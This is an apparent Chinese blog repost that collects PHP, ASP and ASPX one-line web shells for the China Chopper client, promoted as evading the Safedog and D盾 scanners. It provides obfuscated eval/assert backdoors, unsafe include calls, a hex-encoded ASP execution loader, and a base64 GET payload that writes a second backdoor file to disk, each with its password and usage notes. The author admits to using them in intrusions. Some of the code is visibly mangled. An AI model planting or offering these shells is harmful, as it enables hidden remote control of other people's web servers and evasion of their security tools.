分享

ASP/PHP一句话木马过安全狗等杀软

 持剑画山河 2017-06-13

站长很辛苦,木马入侵时杀毒软件多数情况并不能起到很好的作用,本博偶尔在入侵过程中会用到的一些过杀软木马,对杀软无力吐槽。虽然我偶尔玩渗透,但是从未搞过无意义的破坏。

整理一些常用的PHP、ASP、jsp常用到的一句话木马,部分过安全狗、D盾。

看多了之后 自然可以干掉木马……

PHP一句话木马

1$hh = 'p'.'r'.'e'.'g'.'_'.'r'.'e'.'p'.'l'.'a'.'c'.'e';$hh('/[discuz]/e',$_POST['h'],'Access');//菜刀一句话2$filename=$_GET['xbid'];include ($filename);//危险的include函数,直接编译任何文件为php格式运行3$reg='c'.'o'.'p'.'y';$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);//重命名任何文件4$gzid = 'p'.'r'.'e'.'g'.'_'.'r'.'e'.'p'.'l'.'a'.'c'.'e';$gzid('/[discuz]/e',$_POST['h'],'Access');//菜刀一句话5include ($uid);//危险的include函数,直接编译任何文件为php格式运行,POST www.xxx.com/index.php?uid=/home/www/bbs/image.gif//gif插一句话6、典型一句话程序后门代码php eval_r($_POST[sb])?>程序代码php @eval_r($_POST[sb])?>//容错代码程序代码php assert($_POST[sb]);?>//使用lanker一句话客户端的专家模式执行相关的php语句程序代码$_POST['sa']($_POST['sb']);?>程序代码$_POST['sa']($_POST['sb'],$_POST['sc'])?>程序代码php@preg_replace('/[email]/e',$_POST['h'],'error');?>//使用这个后,使用菜刀一句话客户端在配置连接的时候在'配置'一栏输入程序代码<O>h=@eval_r($_POST1);O>程序代码<script language='php'>@eval_r($_POST[sb])script>//绕过
php ($_=@$_GET[2]).@$_($_POST[1])?>

在菜刀里写http://site/1.php?2=assert密码是1

$item['wind’] = 'assert'; 
$array[] = $item; 
$array[0]['wind’]($_POST['pass’]);  
?>

密码:123

<script language='php'>@eval_r($_POST[mima])script>//绕过

菜刀附加数据:

h=@eval($_POST[c]);

[email]和error你看着换吧,怎么隐蔽怎么来

密码 c

超级隐蔽的PHP后门:

php $_GET[a]($_GET[b]);?>

仅用GET函数就构成了木马;

利用方法:

a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};

执行后当前目录生成c.php一句话木马,当传参a为eval时会报错木马生成失败,为assert时同样报错,但会生成木马,真可谓不可小视,简简单单的一句话,被延伸到这般应用。

 

 

ASP一句话木马

<%

password=Request(“Class”)

Execute(AACode(“457865637574652870617373776F726429″)):Function AACode(byVal s):For i=1 To Len(s) Step 2:c=Mid(s,i,2):If IsNumeric(Mid(s,i,1)) Then:Execute(“AACode=AACode&chr(&H”&c&”)”):Else:Execute(“AACode=AACode&chr(&H”&c&Mid(s,i+2,2)&”)”):i=i+2:End If:Next:End Function

%>

密码 Class

                                                      // 这个是ASPX的一句话  密码是webadmin

 

<%                    // 过安全狗的ASP一句话木马
dim play
'
'
''''''''''''''''''
'''''''''
play = request('www.exehack.net')
%>
Error
<%
execute(play)
%>

待更新 … … 

转载保留出处,实操注意细节,一人能力有限,团队作战才是王道!

    本站是提供个人知识管理的网络存储空间,所有内容均由用户发布,不代表本站观点。请注意甄别内容中的联系方式、诱导购买等信息,谨防诈骗。如发现有害或侵权内容,请点击一键举报。
    转藏 分享 献花(0

    0条评论

    发表

    请遵守用户 评论公约

    类似文章 更多